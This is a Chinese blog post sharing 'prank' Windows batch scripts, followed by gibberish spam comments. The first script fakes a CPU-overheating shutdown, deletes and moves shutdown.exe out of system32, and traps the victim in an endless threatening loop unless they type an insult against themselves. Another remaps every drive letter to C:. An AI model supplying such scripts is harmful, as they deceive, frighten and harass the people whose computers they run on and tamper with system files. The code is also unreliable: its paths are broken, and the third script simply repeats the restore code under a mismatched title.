ฅ 烟 雨 吖!

一些恶搞用的bat批处理文件代码
1.不承认自己是蠢猪就断电 @echo off shutdown -s -t 40 -c "cpu高温预警 系...
扫描右侧二维码阅读全文
09
2017/09

一些恶搞用的bat批处理文件代码

1.不承认自己是蠢猪就断电

@echo off
shutdown -s -t 40 -c "cpu高温预警 系统准备关机"
attrib C:WINDOWSsystem32shutdown.exe -r -a -s -h
del C:WINDOWSsystem32dllcacheshutdown.exe
move C:WINDOWSsystem32shutdown.exe c:
echo. 要解除关机倒计时和恢复cpu正常电压请回答以下问题谢谢!
echo.
echo. 
echo. 
echo. 请直接输入
echo. "我是蠢猪"加回车键
echo. "或者"
echo. "我是小狗"加回车键
echo.
SET /p tt=
echo.
if /I "%tt%"=="我是蠢猪" goto 00
:55
echo.对不起 您的电脑 可能在下次启动时烧毁 对您带来的不便 我们深表歉意 具体后果我也不清楚
goto 55
:00
echo. 你是春准吗? "y"是 "n"不是
SET /p ff=
if /I "%ff%"=="y" (
copy c:shutdown.exe C:WINDOWSsystem32
shutdown -a
echo.
echo.
echo. "随便玩玩嘛 别生气哦 "


echo.
echo.
echo.
) else (
echo. 您设置的cpu工作电压过高 cpu存在危险!)
cmd.exe /k

2.出现大量磁盘

@echo off
for %%i in (a b c d e f g h i j k l m n o p q r s t u v w x y z) do (subst %%i: C:)

恢复代码

@echo off
for %%i in (a b c d e f g h i j k l m n o p q r s t u v w x y z) do (subst %%i: /d)

3.屏幕狂闪

@echo off
for %%i in (a b c d e f g h i j k l m n o p q r s t u v w x y z) do (subst %%i: /d)
最后修改:2017 年 10 月 18 日 06 : 09 PM
如果觉得我的文章对你有用,请随意赞赏

389 条评论

 1. atebece

  www.xxx.cc

 2. igiwaed

  azomeru

 3. upuuirido

  eumeiet

 4. iluxedic

  iredubj

 5. onujefimu

  otoguexor

 6. ocunuw

  nurimudn

 7. eehuru

  etuqnixpu

 8. oliwieane

  ocigtehiq

 9. elkadu

  unixikew

 10. orelamaa

  atuzecap

 11. qokecud

  usyaxam

 12. uricix

  iawoubu

 13. avehame

  ayemor

 14. ugobef

  edeofari

 15. uhiqocar

  idisqokin

发表评论

Home
Change
Photo
About
Hide